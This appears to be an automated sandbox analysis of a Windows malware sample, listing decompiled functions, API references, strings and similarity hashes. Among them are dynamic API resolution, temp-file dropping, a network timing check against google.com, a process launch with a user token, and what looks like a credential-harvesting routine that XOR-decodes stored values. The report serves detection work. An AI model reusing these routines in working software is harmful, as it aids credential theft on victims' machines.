    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: HttpRequest$HeadersObjectSendSingleWait
    • String ID: 0h`p
    • API String ID: 2328130936-2723391422
    • Opcode ID: 589c202f75f38df9c3ca41c7851bbe349b30567e13577554cd8e6a4b121b50ce
    • Instruction ID: 1bc04f9ab690f8e293a24b66b680d7f0651b840fc14eaa883e7c5c70cc34b0cc
    • Opcode Fuzzy Hash: 589c202f75f38df9c3ca41c7851bbe349b30567e13577554cd8e6a4b121b50ce
    • Instruction Fuzzy Hash: F0116A31404209EBCB119F50EC408EF7FA8FB88760F10862BF95491161D735CAA5DBDA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 73%
    			E004134BE(void* __eflags) {
    				signed int _v8;
    				char _v20;
    				char _v44;
    				char _v92;
    				void* __edi;
    				void* __esi;
    				void* _t17;
    				CHAR* _t27;
    				intOrPtr* _t28;
    				WCHAR* _t30;
    				struct HINSTANCE__* _t31;
    
    				_t30 =  &_v44;
    				E00405B00(0xe3, _t30);
    				_t31 = GetModuleHandleW(_t30);
    				if(_t31 != 0) {
    					_t27 =  &_v20;
    					E00405ACA(0xe4, _t27);
    					_t28 = GetProcAddress(_t31, _t27);
    					if(_t28 == 0) {
    						L4:
    						_t17 = 0;
    						L6:
    						return _t17;
    					}
    					_v8 = _v8 & 0x00000000;
    					_t32 =  &_v92;
    					E00405B00(0xd5,  &_v92);
    					_push(0x1e6);
    					_push("0x729B4D62");
    					if(E00407BF3( &_v8, _t32, 0x7070707) > 0) {
    						 *_t28(0, _v8, "#", 0x10040);
    						E00406E85(_v8);
    						_t17 = 1;
    						goto L6;
    					}
    					goto L4;
    				}
    				return 0;
    			}

    APIs
    • GetModuleHandleW.KERNEL32(?), ref: 004134D5
    • GetProcAddress.KERNEL32(00000000,?), ref: 004134F7
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressHandleModuleProc
    • String ID: 0x729B4D62
    • API String ID: 1646373207-950121167
    • Opcode ID: dceda47abd91cc5f8bc59fc37edaf602fd2d96705f1f19eb4f657377b1122760
    • Instruction ID: 99f9d4dfa15c7b055542410aa908031a423bdc71755d055d0c64b1f32271d73c
    • Opcode Fuzzy Hash: dceda47abd91cc5f8bc59fc37edaf602fd2d96705f1f19eb4f657377b1122760
    • Instruction Fuzzy Hash: 3101D676E00744B7CB116AA99C06BDF3B69DB80B15F100076FE01F7281D978EF01D5A9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004131E9(void* __ecx, WCHAR* __edi, signed int _a4) {
    				char _v108;
    				char _v158;
    				char _v178;
    				char _v198;
    				char _v596;
    				void* __esi;
    				signed int _t12;
    				int _t14;
    				WCHAR* _t16;
    				char* _t18;
    				WCHAR* _t19;
    
    				_t19 = __edi;
    				 *__edi = 0;
    				E00413194(__ecx,  &_v596);
    				_t12 = _a4;
    				if(_t12 == 0) {
    					L6:
    					_t18 =  &_v178;
    					goto L7;
    				} else {
    					_t12 = _t12 - 1;
    					if(_t12 == 0) {
    						_t18 =  &_v198;
    						L7:
    						_t16 = 0x4239c8;
    						goto L8;
    					} else {
    						_t12 = _t12 - 1;
    						if(_t12 == 0) {
    							goto L6;
    						} else {
    							_t14 = _t12 - 1;
    							if(_t14 == 0) {
    								_t16 = L"SOFTWARE\\Microsoft";
    								_t18 =  &_v158;
    								L8:
    								_t21 =  &_v108;
    								_t14 = E00407090(_t12 | 0xffffffff, _t18,  &_v108, 0, 0x32);
    								if(_t14 != 0) {
    									_t14 = E0040C70A(_t21, _t19, _t16);
    									if(_t14 == 0) {
    										L12:
    										_t14 = 0;
    										 *_t19 = 0;
    									} else {
    										if(_a4 == 0) {
    											_t14 = PathRenameExtensionW(_t19, L".dat");
    											if(_t14 == 0) {
    												goto L12;
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    				return _t14;
    			}

    APIs
    • PathRenameExtensionW.SHLWAPI(?,.dat,?,004239C8,00000000,00000032,?,77E49EB0,00000000), ref: 00413262
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: ExtensionPathRename
    • String ID: .dat$SOFTWARE\Microsoft
    • API String ID: 3337224433-47915998
    • Opcode ID: 205399969e23e4123cb54b74d1f549c8fad68b60afbe584b8ab74fdcfc23b97b
    • Instruction ID: 4edbfe2b8421f84d579018dba52f3caef0dc6151aa5e3cc3ef41ab5e4fdc523d
    • Opcode Fuzzy Hash: 205399969e23e4123cb54b74d1f549c8fad68b60afbe584b8ab74fdcfc23b97b
    • Instruction Fuzzy Hash: C8018C706102059ADF20FF749D81BEA7368AF61346F5005A7E905F22C1E73CAF80C65E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 81%
    			E0040C201(intOrPtr _a4, intOrPtr _a8) {
    				short _v524;
    				char _v1044;
    				void* __edi;
    				void* _t12;
    				void* _t20;
    				void* _t21;
    
    				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {
    					L6:
    					return 0;
    				}
    				_t20 = 0;
    				while(1) {
    					_push(_a4);
    					_push(E004081BE());
    					_push(L"tmp");
    					_t19 =  &_v1044;
    					_t12 = E00407B78(_t11, 0x104,  &_v1044, L"%s%08x.%s");
    					_t21 = _t21 + 0x10;
    					if(_t12 == 0xffffffff) {
    						goto L6;
    					}
    					if(E0040C70A(_t19, _a8,  &_v524) == 0 || E0040C035(_a8, 0, 0) == 0) {
    						_t20 = _t20 + 1;
    						if(_t20 < 0x64) {
    							continue;
    						}
    						goto L6;
    					} else {
    						return 1;
    					}
    				}
    				goto L6;
    			}

    APIs
    • GetTempPathW.KERNEL32(000000F6,?), ref: 0040C218
      • Part of subcall function 004081BE: GetTickCount.KERNEL32 ref: 004081BE
      • Part of subcall function 0040C70A: PathCombineW.SHLWAPI(?,)A,?,00412909,?,?), ref: 0040C729
      • Part of subcall function 0040C035: CreateFileW.KERNEL32(0040895F,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,0040C274,0040895F,00000000,00000000,0040895F,?), ref: 0040C04F
      • Part of subcall function 0040C035: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040C274,0040895F,00000000,00000000,0040895F,?), ref: 0040C072
      • Part of subcall function 0040C035: CloseHandle.KERNEL32(00000000,?,0040C274,0040895F,00000000,00000000,0040895F,?), ref: 0040C07F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: FilePath$CloseCombineCountCreateHandleTempTickWrite
    • String ID: %s%08x.%s$tmp
    • API String ID: 3395140874-234517578
    • Opcode ID: a684c462db1f4b90f6eccd4e67bda00e08631f9e68a21bd12b4069c6ccb209d5
    • Instruction ID: 321ec92223b5c1eb998e88019a0864bd68a66da4e3e4e0b01975055c0ed656b5
    • Opcode Fuzzy Hash: a684c462db1f4b90f6eccd4e67bda00e08631f9e68a21bd12b4069c6ccb209d5
    • Instruction Fuzzy Hash: 43014971940214B6DF2037A49C85FEB3719DB42354F1003BBFE60B65E1C6799E8AD69C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040AA59(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
    				short _v524;
    				void* __esi;
    				WCHAR* _t17;
    				intOrPtr _t25;
    				int _t27;
    
    				_t27 = 0;
    				if(GetTempFileNameW(_a12 + 0x746, L"cab", 0,  &_v524) != 0 && E0040C1E0( &_v524) != 0) {
    					_t17 = PathFindFileNameW( &_v524);
    					_t25 = _a4;
    					E00407004(_a8 + 0xfffffffd | 0xffffffff, _t17, _t25 + 3, 0, _a8 + 0xfffffffd);
    					E00406EC1(_t25, "?T", 2);
    					 *((char*)(_t25 + 2)) = 0x5c;
    					_t27 = 1;
    				}
    				return _t27;
    			}

    APIs
    • GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 0040AA7B
      • Part of subcall function 0040C1E0: SetFileAttributesW.KERNEL32(00000080,00000080,00414759,?), ref: 0040C1E9
      • Part of subcall function 0040C1E0: DeleteFileW.KERNEL32(?), ref: 0040C1F3
    • PathFindFileNameW.SHLWAPI(?,?,?), ref: 0040AA9D
      • Part of subcall function 00407004: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00407CFC,00000000,00000000,00000000,00407061,00000000,00000000,00000000,?,00000000), ref: 0040701F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: File$Name$AttributesByteCharDeleteFindMultiPathTempWide
    • String ID: cab
    • API String ID: 2491076439-1787492089
    • Opcode ID: ee95de48f592c4358e66f7ad4c48418422b647a1aa91e54deaf77f6cff0f152a
    • Instruction ID: 35b0fac01b63a355821587bb3daf25a01ba2b4008c94ea4b546794103305f32d
    • Opcode Fuzzy Hash: ee95de48f592c4358e66f7ad4c48418422b647a1aa91e54deaf77f6cff0f152a
    • Instruction Fuzzy Hash: 7B01D676A0031467CB209B68CC4AFCB77AC9F49764F000362BA65F31D2DA78E9448AE4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 84%
    			E00415A4A(void* __ecx, void* __esi, void* _a4, void* _a8, void* _a12, intOrPtr _a16) {
    				void* _t13;
    				void** _t24;
    				void* _t27;
    
    				_t13 = _a4(_a8,  &_a8);
    				if(_t13 != 0) {
    					_t24 = E0040A574(__ecx, _a8);
    					if(_t24 != 0) {
    						if(EqualSid( *_t24, _a12) != 0) {
    							_t27 = _a8;
    							if(E00407BF3( &_a4, L"\"%s\"", _a16) > 0) {
    								E004087A7(_t27, _a4);
    								E00406E85(_a4);
    							}
    						}
    						E00406E85(_t24);
    					}
    					return CloseHandle(_a8);
    				}
    				return _t13;
    			}

    APIs
      • Part of subcall function 0040A574: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,00000000,00000000,?,?,004084BE,?,?,?,00412CDF,000000FF,00423978), ref: 0040A58D
      • Part of subcall function 0040A574: GetLastError.KERNEL32(?,?,004084BE,?,?,?,00412CDF,000000FF,00423978,?,?,00000000), ref: 0040A593
      • Part of subcall function 0040A574: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,?,004084BE,?,?,?,00412CDF,000000FF,00423978), ref: 0040A5B9
    • EqualSid.ADVAPI32(00000000,00000000,?,00000000,?,00415BA4,00000000,?,?,?), ref: 00415A6F
      • Part of subcall function 004087A7: LoadLibraryA.KERNEL32(userenv.dll,00000000), ref: 004087B8
      • Part of subcall function 004087A7: GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 004087D7
      • Part of subcall function 004087A7: GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 004087E3
      • Part of subcall function 004087A7: CreateProcessAsUserW.ADVAPI32(?,00000000,00415A9E,00000000,00000000,00000000,00415A9E,00415A9E,00000000,?,?,?,00000000,00000044), ref: 00408854
      • Part of subcall function 004087A7: CloseHandle.KERNEL32(?), ref: 00408867
      • Part of subcall function 004087A7: CloseHandle.KERNEL32(?), ref: 0040886C
      • Part of subcall function 004087A7: FreeLibrary.KERNEL32(?), ref: 00408883
      • Part of subcall function 00406E85: HeapFree.KERNEL32(00000000,00000000,0040867C,00000000,?,?,?,004127CC,00000000,00412CA6), ref: 00406E98
    • CloseHandle.KERNEL32(?,?,00000000,?,00415BA4,00000000,?,?,?), ref: 00415AB0
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseHandle$AddressFreeInformationLibraryProcToken$CreateEqualErrorHeapLastLoadProcessUser
    • String ID: "%s"
    • API String ID: 4035272744-3297466227
    • Opcode ID: 452eb548b03f139ff93d7d8e9afed597ea69144bb243d1e91b2b593385a542d4
    • Instruction ID: 8030f3e327fc6ebeac315f18cb7666adaec022fe4c93b6fff034a576fc469303
    • Opcode Fuzzy Hash: 452eb548b03f139ff93d7d8e9afed597ea69144bb243d1e91b2b593385a542d4
    • Instruction Fuzzy Hash: 1BF06D35500109BBCF116F21ED45DDF3F69AF80390B048136BC0CE6161DB39DA60DB98
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • getpeername.WS2_32(000000FF,00000000,00000000), ref: 00406B14
    • getsockname.WS2_32(000000FF,00000000,00000000), ref: 00406B23
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: getpeernamegetsockname
    • String ID: BAA
    • API String ID: 2691512538-1692831742
    • Opcode ID: 627a6f461b8cdcb368e07ad735daf8e55cba88348361bfe94107fefa3199f565
    • Instruction ID: f61e330934a4539e64815c77ffe9ec5361f293376b7fbb3bdf640de5d8019891
    • Opcode Fuzzy Hash: 627a6f461b8cdcb368e07ad735daf8e55cba88348361bfe94107fefa3199f565
    • Instruction Fuzzy Hash: C90188B5D0024DAADF00CFA4C8447EE7BF4AF05314F008166E862F62D1D7789A55DB59
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00408F4E(intOrPtr __eax, void* __eflags) {
    				long _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				char* _v40;
    				intOrPtr _v44;
    				intOrPtr _v48;
    				intOrPtr _v52;
    				char _v56;
    				void* __edi;
    				intOrPtr _t26;
    
    				_t26 = 0;
    				_v56 = 0x101;
    				_v52 = 0;
    				_v48 = __eax;
    				_v44 = E00408ECD();
    				_v40 = "http://www.google.com/webhp";
    				_v36 = 0;
    				_v32 = 0;
    				_v28 = 0;
    				_v24 = 0;
    				_v20 = 0;
    				_v16 = 0x80000;
    				_v12 = 0;
    				_v8 = GetTickCount();
    				if(E00408D9B( &_v56, 0) != 0) {
    					_t26 = GetTickCount() - _v8;
    				}
    				E00406E85(_v44);
    				return _t26;
    			}

    APIs
      • Part of subcall function 00408ECD: LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 00408EDE
      • Part of subcall function 00408ECD: GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 00408EF1
      • Part of subcall function 00408ECD: FreeLibrary.KERNEL32(?), ref: 00408F43
    • GetTickCount.KERNEL32 ref: 00408F93
      • Part of subcall function 00408D9B: WaitForSingleObject.KERNEL32(?,?,?,?,00000000), ref: 00408DEF
      • Part of subcall function 00408D9B: InternetCloseHandle.WININET(00000000), ref: 00408E88
    • GetTickCount.KERNEL32 ref: 00408FA5
    Strings
    • http://www.google.com/webhp, xrefs: 00408F73
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CountLibraryTick$AddressCloseFreeHandleInternetLoadObjectProcSingleWait
    • String ID: http://www.google.com/webhp
    • API String ID: 2673491915-2670330958
    • Opcode ID: bc0e934ddc56b4dc5606155300f98fe67b626741d739b96fef687cb00b4936a5
    • Instruction ID: 1a69adfa867b738e4cbe6527632920714cd91ecdb092cb3a4ef06f34a26a0793
    • Opcode Fuzzy Hash: bc0e934ddc56b4dc5606155300f98fe67b626741d739b96fef687cb00b4936a5
    • Instruction Fuzzy Hash: 9B01E8B1D112289ACF00DFE9D9444DEFBB8BF48758F10456BE940B3250D7B95A058BD8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040AF41(signed char* __esi, long _a4, _Unknown_base(*)()* _a8, char _a12) {
    				void* _t9;
    
    				if( *__esi < 0x40) {
    					if(_a8 == 0) {
    						L6:
    						return 1;
    					}
    					_t2 =  &_a12; // 0x423860
    					_t9 = CreateThread(0, _a4, _a8,  *_t2, 0, 0);
    					if(_t9 == 0) {
    						L2:
    						return 0;
    					}
    					__esi[4 + ( *__esi & 0x000000ff) * 4] = _t9;
    					 *__esi =  *__esi + 1;
    					goto L6;
    				}
    				SetLastError(0x9b);
    				goto L2;
    			}

    APIs
    • SetLastError.KERNEL32(0000009B,004157D2,00000000,00415670,00000000,00423860,00000000,0041348A,00423860,00000000,00000104,74B5F560,00000000), ref: 0040AF4B
    • CreateThread.KERNEL32 ref: 0040AF6E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CreateErrorLastThread
    • String ID: `8B
    • API String ID: 1689873465-953912949
    • Opcode ID: 26016d5e18915806e2dc301fd77dc21ebf6ed6cc4e18a2796d6357e1653bc88c
    • Instruction ID: 448d3ac3a92d084e3e9f0d8064f43f3addb4d9012edd484dd78cd3599ff34ea2
    • Opcode Fuzzy Hash: 26016d5e18915806e2dc301fd77dc21ebf6ed6cc4e18a2796d6357e1653bc88c
    • Instruction Fuzzy Hash: BDE0D8B0108342AADB215F709E09B2ABFD1AF4DB01F10486DF3C5361E1C2798065DB2F
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E0041933A(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
    				char _v524;
    				char _v576;
    				char _v580;
    				char _v588;
    				intOrPtr _v608;
    				char _v612;
    				char _v620;
    				char _v628;
    				char _v632;
    				char* _v640;
    				signed int _v644;
    				char* _v648;
    				char** _v652;
    				intOrPtr _v656;
    				intOrPtr _v660;
    				char* _v664;
    				char* _v668;
    				char* _v672;
    				char* _v676;
    				void* __edi;
    				void* __esi;
    				signed int _t82;
    				char* _t83;
    				intOrPtr _t85;
    				char** _t101;
    				char* _t112;
    				char* _t121;
    				char* _t122;
    				void* _t123;
    				char* _t126;
    				char* _t127;
    				char* _t156;
    				void* _t157;
    				signed int _t166;
    				char* _t167;
    				char** _t168;
    				intOrPtr _t170;
    				char* _t171;
    				signed int _t172;
    				void* _t174;
    
    				_t174 = (_t172 & 0xfffffff8) - 0x294;
    				if(E0040C70A( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
    					L31:
    					return 1;
    				}
    				_t177 =  *__edx & 0x00000010;
    				if(( *__edx & 0x00000010) == 0) {
    					_push( &_v524);
    					_t82 = 2;
    					_t83 = E0040C09A(_t82,  &_v524,  &_v612);
    					__eflags = _t83;
    					if(_t83 == 0) {
    						goto L31;
    					}
    					_t85 = E00407720(_v608,  &_v652, _v612, 1, 0);
    					_v660 = _t85;
    					__eflags = _t85 - 0xffffffff;
    					if(_t85 == 0xffffffff) {
    						L30:
    						E0040C142( &_v612);
    						goto L31;
    					}
    					_v640 = E00406E55(0x622);
    					E00405ACA(0x91,  &_v588);
    					E00405ACA(0x92,  &_v628);
    					E00405ACA(0x93,  &_v620);
    					E00405ACA(0x94,  &_v576);
    					__eflags = _v640;
    					if(_v640 == 0) {
    						L29:
    						E00406E85(_v640);
    						E00406EA1(_v652, _v656);
    						goto L30;
    					}
    					_v644 = 0;
    					__eflags = _v648;
    					if(_v648 > 0) {
    						do {
    							_t166 = _v644;
    							_t101 = _v652;
    							__eflags =  *(_t101 + _t166 * 4);
    							if( *(_t101 + _t166 * 4) == 0) {
    								goto L28;
    							}
    							_v664 = StrStrIA( *(_t101 + _t166 * 4),  &_v588);
    							_t156 = StrStrIA( *(_v656 + _t166 * 4),  &_v632);
    							_v668 = StrStrIA( *(_v660 + _t166 * 4),  &_v628);
    							_t112 = StrStrIA( *(_v664 + _t166 * 4),  &_v588);
    							__eflags = _v676;
    							_t167 = _t112;
    							if(_v676 == 0) {
    								goto L28;
    							}
    							__eflags = _v672;
    							if(_v672 == 0) {
    								goto L28;
    							}
    							__eflags = _t167;
    							if(_t167 == 0) {
    								goto L28;
    							}
    							_v676 =  &(_v676[8]);
    							_v672 =  &(_v672[6]);
    							_t168 =  &(_t167[0xa]);
    							_v652 = _t168;
    							E00419320();
    							E00419320();
    							E00419320();
    							__eflags = _t156;
    							if(_t156 == 0) {
    								L15:
    								_t157 = 0x15;
    								L16:
    								__eflags =  *_v676;
    								if( *_v676 == 0) {
    									goto L28;
    								}
    								__eflags =  *_v672;
    								if( *_v672 == 0) {
    									goto L28;
    								}
    								_t121 =  *_t168;
    								__eflags = _t121;
    								if(_t121 == 0) {
    									goto L28;
    								}
    								__eflags = _t121 - 0x30;
    								if(_t121 == 0x30) {
    									L21:
    									__eflags = _t168[0];
    									if(_t168[0] == 0) {
    										goto L28;
    									}
    									L22:
    									_t122 = 0;
    									__eflags =  *_t168;
    									if( *_t168 == 0) {
    										goto L28;
    									} else {
    										goto L23;
    									}
    									do {
    										L23:
    										_t122[_t168] = _t122[_t168] ^ 0x00000019;
    										_t122 =  &(_t122[1]);
    										__eflags = _t122[_t168];
    									} while (_t122[_t168] != 0);
    									__eflags = _t122;
    									if(_t122 > 0) {
    										_t169 =  &_v580;
    										_t123 = 0x57;
    										E00405B00(_t123,  &_v580);
    										_push(_t157);
    										_push(_v676);
    										_t158 = _v656;
    										_push(_v652);
    										_push(_v672);
    										_t126 = E00407B78(_t169, 0x311, _v656, _t169);
    										_t174 = _t174 + 0x14;
    										__eflags = _t126;
    										if(_t126 > 0) {
    											_t170 = _a4;
    											_t127 = E00407279(_t126, _t170, _t158);
    											__eflags = _t127;
    											if(_t127 != 0) {
    												_t68 = _t170 + 4;
    												 *_t68 =  &(( *(_t170 + 4))[1]);
    												__eflags =  *_t68;
    											}
    										}
    									}
    									goto L28;
    								}
    								__eflags = _t121 - 0x31;
    								if(_t121 != 0x31) {
    									goto L22;
    								}
    								goto L21;
    							}
    							_v648 =  &(_t156[6]);
    							E00419320();
    							_t157 = E00407504(_v648,  &_v588, 0);
    							__eflags = _t157 - 1;
    							if(_t157 < 1) {
    								goto L15;
    							}
    							__eflags = _t157 - 0xffff;
    							if(_t157 <= 0xffff) {
    								goto L16;
    							}
    							goto L15;
    							L28:
    							_v644 = _v644 + 1;
    							__eflags = _v644 - _v648;
    						} while (_v644 < _v648);
    					}
    					goto L29;
    				} else {
    					_t171 =  &_v612;
    					E00405B00(0x90, _t171);
    					_v648 = _t171;
    					E0040C5AE( &_v524,  &_v648, _t177, 1, 5, E0041933A, _a4, 0, 0, 0);
    					goto L31;
    				}
    			}

    APIs
      • Part of subcall function 0040C70A: PathCombineW.SHLWAPI(?,)A,?,00412909,?,?), ref: 0040C729
    • StrStrIA.SHLWAPI(?,?,?,?), ref: 00419460
    • StrStrIA.SHLWAPI(?,?), ref: 00419472
    • StrStrIA.SHLWAPI(?,?), ref: 00419482
    • StrStrIA.SHLWAPI(?,?), ref: 00419494
      • Part of subcall function 0040C5AE: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040C5ED
      • Part of subcall function 0040C5AE: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040C614
      • Part of subcall function 0040C5AE: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0040C65E
      • Part of subcall function 0040C5AE: Sleep.KERNEL32(00000000,?,?), ref: 0040C6BB
      • Part of subcall function 0040C5AE: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0040C6E9
      • Part of subcall function 0040C5AE: FindClose.KERNEL32(?,?,?,?,00000000), ref: 0040C6FB
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Find$FilePath$CloseCombineFirstMatchNextObjectSingleSleepSpecWait
    • String ID:
    • API String ID: 1075381090-0
    • Opcode ID: 7ac468dbb1a69375882c11ac944966693f8c9b80e384dd0b661a841a40fe8adf
    • Instruction ID: 3842fac5284648828184a3c8fac80a944414852b35db22dfa5ded6b40b6195cf
    • Opcode Fuzzy Hash: 7ac468dbb1a69375882c11ac944966693f8c9b80e384dd0b661a841a40fe8adf
    • Instruction Fuzzy Hash: BF71C472508341AFD721DF25C851B9FB7E6AF84304F44092EF895A7291C738ED86CB9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00405B4A(intOrPtr _a4) {
    				intOrPtr _v8;
    				void* __esi;
    				void* _t13;
    				signed int _t19;
    				signed short _t26;
    				signed int _t30;
    				void* _t37;
    
    				_t37 = E004079D4(_a4);
    				if(_t37 > 0x3e8) {
    					EnterCriticalSection(0x4223b8);
    					E00406E85( *0x4223ac);
    					 *0x4223ac =  *0x4223ac & 0x00000000;
    					 *0x4223b4 = 0;
    					LeaveCriticalSection(0x4223b8);
    					return 0;
    				}
    				EnterCriticalSection(0x4223b8);
    				_t26 = ( *0x4223b4 & 0x0000ffff) + _t37;
    				if(_t26 <= 0x3e8) {
    					_t13 = E00406E10(_t26 + _t26, 0x4223ac);
    					if(_t13 != 0) {
    						_t30 =  *0x4223ac; // 0x0
    						_t13 = E00406EC1(_t30 + ( *0x4223b4 & 0x0000ffff) * 2, _a4, _t37 + _t37);
    						 *0x4223b4 = _t26;
    					}
    				} else {
    					_t13 = E00406E10(0x7d0, 0x4223ac);
    					if(_t13 != 0) {
    						_t18 = 0x3e8 - _t37;
    						_t19 =  *0x4223ac; // 0x0
    						E00406EC1(_t19, _t19 + (( *0x4223b4 & 0x0000ffff) - 0x3e8 - _t37) * 2, 0x3e8 - _t37 + _t18);
    						_t13 = E00406EC1(0x3e8 - _t37 + _t18 +  *0x4223ac, _v8, _t37 + _t37);
    						 *0x4223b4 = 0x3e8;
    					}
    				}
    				LeaveCriticalSection(0x4223b8);
    				return _t13;
    			}

    APIs
    • EnterCriticalSection.KERNEL32(004223B8,?,?,?,00405E3D,?), ref: 00405B67
      • Part of subcall function 00406E85: HeapFree.KERNEL32(00000000,00000000,0040867C,00000000,?,?,?,004127CC,00000000,00412CA6), ref: 00406E98
    • LeaveCriticalSection.KERNEL32(004223B8,?,?,?,00405E3D,?), ref: 00405B88
    • EnterCriticalSection.KERNEL32(004223B8,?,?,?,?,00405E3D,?), ref: 00405B99
    • LeaveCriticalSection.KERNEL32(004223B8,?,?,?,00405E3D,?), ref: 00405C32
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalSection$EnterLeave$FreeHeap
    • String ID:
    • API String ID: 1946732658-0
    • Opcode ID: f305d5ba9391eed4c34a6e81c576921ba9f6cd932b350051a0bc092bee24c33e
    • Instruction ID: befded29e7ebc60eb341f187559da6e9fc6c1e70589ca037fc3e61ca885b50e6
    • Opcode Fuzzy Hash: f305d5ba9391eed4c34a6e81c576921ba9f6cd932b350051a0bc092bee24c33e
    • Instruction Fuzzy Hash: 4421CF31204214BFC720EFB4EE84A7A33A9EB90315740043FF902A61B1EABC5816CB9C
    Uniqueness

    Uniqueness Score: -1.00%